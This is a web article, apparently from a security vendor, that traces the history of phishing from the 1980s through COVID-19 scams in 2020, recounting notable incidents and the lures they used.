The history of phishing

Curious to learn how phishing evolved to become one of the greatest threats both consumers and businesses face?

Circle stripe pattern
Gray dot header

40 years of phish

A phishing technique was described in detail in a paper and presentation delivered to the 1987 International HP Users Group, Interex.

The first known mention of the term ‘phishing’ was in 1996 in the hacking tool AOHell created by a well-known hacker and spammer.

The start

This is about the time phishing as we know it started, although the technique wasn't well-known to the average user until almost 10 years later. Phishing scams use spoofed emails, fake websites, etc. as a hook to get people to voluntarily hand over sensitive information. It makes sense that the term “phishing” is commonly used to describe these ploys. Hackers in the early days called themselves ‘phreaks’, referring to the exploration, experimenting and study of telecommunication systems. Phreaks and hackers have always been closely related, and the ‘ph’ spelling linked phishing attacks with these underground communities.

In a lot of ways, phishing hasn’t changed much since early AOL attacks. In 2001, however, phishers began exploiting online payment systems. The first attack was on E-Gold in June 2001, and later in the year a "post-9/11 id check" was carried out soon after the September 11 attacks on the World Trade Center.

Forgeries emerging

In 2003, phishers registered dozens of domains that were very similar to eBay and PayPal, and could pass as their legitimate counterparts if you weren't paying close enough attention. Email worm programs sent phishing emails to PayPal customers (containing the fake website links), asking them to update their credit card numbers and other personally identifiable information. Also, the first known phishing attack against a bank was reported by The Banker in September 2003.

By early 2004, phishers were seeing major success for their exploits. It is estimated that between May 2004 and May 2005, approximately 1.2 million computer users in the United States suffered losses caused by phishing, totaling approximately US $929 million. United States businesses were losing about US $2 billion per year to phishing.

Almost half of phishing thefts in 2006 were committed by groups operating through the Russian Business Network based in St. Petersburg.

A report from Gartner in 2007 claimed 3.6 million users lost $3.2 billion in a one year span.

The file sharing service RapidShare was targeted in 2008 by malicious actors who discovered they could open a premium account, thereby removing speed caps on downloads, auto-removal of uploads, waits on downloads, and cool down times between uploads. In a nutshell it made phishing campaigns much easier to execute.

In January 2009, a single phishing attack earned cybercriminals US $1.9 million in unauthorized wire transfers through Experi-Metal's online banking accounts.

Technical sophistication

In March 2011, Internal RSA staff were successfully phished, leading to the master keys for all RSA security tokens being stolen, which were used to break into US defense suppliers.

In August 2013, advertising platform Outbrain became a victim of spear phishing when the Syrian Electronic Army placed redirects into the websites of The Washington Post, Time, and CNN.

In November 2013, Target suffered a data breach in which 110 million credit card records were stolen from customers, via a phished subcontractor account. Target’s CEO and IT security staff members were subsequently fired.

Between September and December of 2013, Cryptolocker ransomware infected 250,000 personal computers with two different phishing emails. The first had a Zip archive attachment that claimed to be a customer complaint and targeted businesses, the second contained a malicious link with a message regarding a problem clearing a check and targeted the general public. Cryptolocker scrambles and locks files on the computer and requests the owner make a payment in exchange for the key to unlock and decrypt the files. According to Dell SecureWorks, 0.4% or more of those infected paid criminals the ransom.

In January 2014, the Seculert Research Lab identified a new targeted attack that used Xtreme RAT (Remote Access Toolkit). Spear phishing emails targeted Israeli organizations to deploy the advanced malware. 15 machines were compromised - including those belonging to the Civil Administration of Judea and Samaria.

In August 2014, iCloud leaked almost 500 private celebrity photos, many containing nudity. It was discovered during the investigation that Ryan Collins accomplished this phishing attack by sending emails to the victims that looked like legitimate Apple and Google warnings, alerting the victims that their accounts may have been compromised and asking for their account details. The victims would enter their password, and Collins gained access to their accounts, downloading emails and iCloud backups.

In September 2014, Home Depot suffered a massive breach, with the personal and credit card data of 100+million shoppers posted for sale on hacking websites.

In November 2014, ICANN employees became victims of spear phishing attacks, and its DNS zone administration system was compromised, allowing the attackers to get zone files and personal data about users in the system, such as their real names, contact information, and salted hashes of their passwords. Using these stolen credentials, the hackers tunneled into ICANN's network and compromised the Centralized Zone Data System (CZDS), their Whois portal and more.

In August 2015, another sophisticated hacking group attributed to the Russian Federation, nicknamed Cozy Bear, was linked to a spear phishing attack against the Pentagon email system, shutting down the unclassified email system used by the Joint Chiefs of Staff office.

In August 2015, Fancy Bear used a zero-day exploit of Java, spoofing the Electronic Frontier Foundation and launched attacks against the White House and NATO. The hackers used a spear phishing attack, directing emails to the fraudulent url electronicfrontierfoundation.org.

In August 2016, the World Anti-Doping Agency reported a phishing attack against their users, claiming to be official WADA communications requesting their login details. The registration and hosting information for the two domains provided by WADA pointed to Fancy Bear.

In 2017, 76% of organizations experienced phishing attacks. Nearly half of information security professionals surveyed said that the rate of attacks had increased since 2016.

In November of 2017, Kazakhstan-born Canadian citizen Karim Baratov pleaded guilty to the massive 2014 Yahoo hack that affected three billion accounts and admitted to helping the Russian intelligence.

PhishLabs published new analysis in December 2017 showing that phishers have been adopting HTTPS more and more often on their sites.

A sextortion phishing campaign seen in July 2018 was the first to use recipient's actual hacked passwords in the emails to convince people that the hacking threat is real. Given the sheer volume of hacked and stolen personal data now available online, this is a big threat to watch out for in 2018.

Researchers at FireEye examined over half-a-billion emails sent between January and June 2018 and found that one in 101 emails are classed as outright malicious, sent with the goal of compromising a user or network.

Phishing campaigns during the partial U.S. government shut down in January 2019 caused widespread confusion over whether the IRS will be sufficiently operational to process tax returns and issue refunds.

Mastery

According to Microsoft, here are some of the innovative ways they’ve seen phishing attacks evolve from 2019 to 2020: Pointing email links to fake google search results that point to attacker-controlled malware-laden websites, pointing email links to non-existent pages on an attacker-controlled website so that a custom 404 page is presented that can be used to spoof logon pages for legitimate sites, spoofing company-specific Office 365 sign-in pages to look so realistic that users wouldn't give the logon page a second thought.

Tax extension deadline schemes: In early 2020, Even before COVID-19 became a widespread threat in 2020, the IRS saw more than $135 million in falsified tax refund claims, which is astronomical compared to the $15 million seen in 2019 during the same two-month timeframe. With the Tax Day deadline extended to July 15 this year, phishers seized the extra time to send phishing emails, texts and phone calls to up their payday and steal tax refunds from hard working Americans.

Imitating the CDC: In 2020, Researchers find evidence of phishers sending emails posing as the Centers of Disease Control and Prevention (CDC). The messages often contain malicious links, claiming to direct readers to infection prevention measures and COVID-19 vaccine information. However, the links are laced with malware that can infect the user’s device, potentially opening the door to ransomware or serving as a foothold into the user’s company network.

The COVID-19 relief payment scam: In November 2020, the IRS teamed up with multiple states and industry organizations to warn U.S. citizens of an SMS-based phishing scam teasing a $1,200 economic impact payment from the ‘COVID-19 TREAS FUND.’ It stated, "Further action is required to accept this payment into your account. Continue here to accept this payment …" The message then directed the user to a phishing site imitating the IRS.gov Get My Payment website, where the victims were asked to share their personal and bank account information.